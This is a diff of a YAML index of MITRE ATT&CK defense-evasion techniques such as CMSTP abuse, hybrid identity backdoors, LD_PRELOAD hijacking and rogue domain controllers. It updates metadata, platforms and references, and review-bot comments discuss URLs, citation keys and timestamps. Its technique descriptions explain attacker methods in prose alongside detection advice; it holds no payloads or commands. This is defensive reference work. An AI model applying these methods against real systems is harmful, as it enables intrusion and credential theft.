+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
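Review bot: the `Deloitte Environment Awareness` URL gains a trailing `/edit` (`https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) along with the new retrieval date. The earlier hunk had the same file id without `/edit`; the editor form of a Drive link can prompt for sign-in or permissions where the plain file link does not, so please confirm the new URL opens for an unauthenticated reader before the old one is dropped. The rest of this hunk is reordering of the references list and a `modified` bump for T1218.003.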
@@ -4338,8 +4490,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests: []
T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
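Review bot: the Azure AD to Microsoft Entra ID rename is applied consistently to the prose, and the things that should stay literal do: the citation keys `Azure AD Hybrid Identity`, `Azure AD Connect for Read Teamers` and `AADInternals Azure AD On-Prem to Cloud` are unchanged (they must match the `external_references` entries), and the process name `AzureADConnectAuthenticationAgentService` is kept, which is correct since a service name is an identifier and does not follow the product rebrand. One caution: `Read Teamers` in that citation key is a typo inherited from upstream; do not fix it in the description alone, because the `(Citation: ...)` token has to match the `source_name` in the references block exactly or the citation breaks.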
@@ -4905,9 +5049,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
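Review bot: most of this hunk is key reordering rather than a change of values (`x_mitre_deprecated`, `x_mitre_domains`, `x_mitre_is_subtechnique`, `x_mitre_contributors` and `x_mitre_modified_by_ref` move position with identical content), which hides the two real changes: the platform consolidation (`Azure AD`, `Google Workspace` and `Office 365` replaced by `Office Suite` and `Identity Provider`) and the bump from `x_mitre_version: '1.0'` to `'1.1'`. If the generator can serialize keys in a fixed order, future regenerations would show only value changes and be much easier to review.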
@@ -4970,9 +5115,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
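Review bot: the `modified` timestamp for T1207 moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2022-03-08T21:20:04.850Z'`, and the same backward move recurs later in this patch for T1553.006, T1574.006, T1222, T1134.002, T1548.001, T1218.008, T1055.013, T1574.005, T1036.002 and T1542.002, in every case replacing a value ending in `T14:00:00.188Z`. That uniform time of day suggests the old values came from a bulk-stamped bundle and the new ones from the upstream object itself; a sentence in the PR description saying which source is authoritative would stop the date regression from being mistaken for stale input data.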
@@ -5167,8 +5307,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests:
- name: Deploy Docker container
@@ -5485,12 +5621,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5509,6 +5644,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5516,7 +5652,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -5536,29 +5671,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
@@ -5609,7 +5746,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -5676,12 +5812,11 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -5717,6 +5852,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -5728,16 +5867,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -5773,12 +5908,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5786,14 +5921,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5808,6 +5942,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -5816,18 +5951,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -5859,14 +5994,11 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -5987,7 +6119,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1070.001:
@@ -6061,12 +6192,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6163,12 +6293,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -6200,11 +6329,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -6245,11 +6373,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -6305,12 +6432,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6367,7 +6493,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1218.008:
@@ -6403,7 +6528,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6436,13 +6561,11 @@ defense-evasion:
- Application control
